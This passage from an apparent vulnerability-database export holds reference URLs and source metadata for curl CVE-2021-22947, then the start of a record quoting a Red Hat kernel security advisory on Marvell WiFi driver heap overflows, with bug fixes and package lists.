"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22924"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22924"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1354"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5038"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23440"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9802"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30762"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3450"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3899"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8819"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3867"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3900"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30761"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9805"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3449"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9850"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0055"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9803"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2014-3577"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3885"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15503"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10018"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25660"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8844"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1730"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3864"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21684"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14391"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3901"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39226"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11793"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0532"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8816"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3897"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9952"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3517"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20305"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3868"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8846"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25677"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.15"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.7"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5079-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.74.0-1ubuntu2.3"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-34558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4914"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3757"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4848"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3620"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33938"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "VULMON",
"id": "CVE-2021-22947"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "164171"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-381421",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-22947",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166714",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165209",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166279",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164171",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165135",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165053",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22947",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-09-29T00:00:00",
"db": "VULHUB",
"id": "VHN-381421",
"ident": null
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"date": "2022-04-13T22:20:44",
"db": "PACKETSTORM",
"id": "166714",
"ident": null
},
{
"date": "2021-12-09T14:50:37",
"db": "PACKETSTORM",
"id": "165209",
"ident": null
},
{
"date": "2022-03-11T16:38:38",
"db": "PACKETSTORM",
"id": "166279",
"ident": null
},
{
"date": "2021-09-15T15:27:42",
"db": "PACKETSTORM",
"id": "164171",
"ident": null
},
{
"date": "2021-12-03T16:41:45",
"db": "PACKETSTORM",
"id": "165135",
"ident": null
},
{
"date": "2021-11-30T14:44:48",
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"date": "2021-11-23T17:10:05",
"db": "PACKETSTORM",
"id": "165053",
"ident": null
},
{
"date": "2021-09-29T20:15:08.253000",
"db": "NVD",
"id": "CVE-2021-22947",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381421",
"ident": null
},
{
"date": "2024-03-27T15:03:30.377000",
"db": "NVD",
"id": "CVE-2021-22947",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164171"
}
],
"trust": 0.1
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-0202-04",
"sources": [
{
"db": "PACKETSTORM",
"id": "165631"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "bypass",
"sources": [
{
"db": "PACKETSTORM",
"id": "165209"
}
],
"trust": 0.1
}
}
VAR-201909-1526
Vulnerability from variot - Updated: 2026-03-09 20:55There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. 7) - aarch64, noarch, ppc64le
Bug Fix(es):
-
Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)
-
Kernel modules generated incorrectly when system is localized to non-English language (BZ#1705285)
-
RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)
-
7.5) - ppc64, ppc64le, x86_64
Bug Fix(es):
-
Slow console output with ast (Aspeed) graphics driver (BZ#1780145)
-
core: backports from upstream (BZ#1794373)
-
System Crash on vport creation (NPIV on FCoE) (BZ#1796362)
-
[GSS] Can't access the mount point due to possible blocking of i/o on rbd (BZ#1796432)
-
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2020:0374-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:0374 Issue date: 2020-02-04 CVE Names: CVE-2019-14816 CVE-2019-14895 CVE-2019-14898 CVE-2019-14901 CVE-2019-17133 =====================================================================
- Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Security Fix(es):
-
kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi driver (CVE-2019-14816)
-
kernel: heap-based buffer overflow in mwifiex_process_country_ie() function in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c (CVE-2019-14895)
-
kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)
-
kernel: buffer overflow in cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c (CVE-2019-17133)
-
kernel: incomplete fix for race condition between mmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599 (CVE-2019-14898)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
[Azure][7.8] Include patch "PCI: hv: Avoid use of hv_pci_dev->pci_slot after freeing it" (BZ#1766089)
-
[Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat, network interface(eth0) moved to new network namespace does not obtain IP address. (BZ#1766093)
-
[Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed (BZ#1766097)
-
SMB3: Do not error out on large file transfers if server responds with STATUS_INSUFFICIENT_RESOURCES (BZ#1767621)
-
Since RHEL commit 5330f5d09820 high load can cause dm-multipath path failures (BZ#1770113)
-
Hard lockup in free_one_page()->_raw_spin_lock() because sosreport command is reading from /proc/pagetypeinfo (BZ#1770732)
-
patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)
-
fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64 (BZ#1775678)
-
Guest crash after load cpuidle-haltpoll driver (BZ#1776289)
-
RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of retry delay value (BZ#1776290)
-
Multiple "mv" processes hung on a gfs2 filesystem (BZ#1777297)
-
Moving Egress IP will result in conntrack sessions being DESTROYED (BZ#1779564)
-
core: backports from upstream (BZ#1780033)
-
kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)
-
Race between tty_open() and flush_to_ldisc() using the tty_struct->driver_data field. (BZ#1780163)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
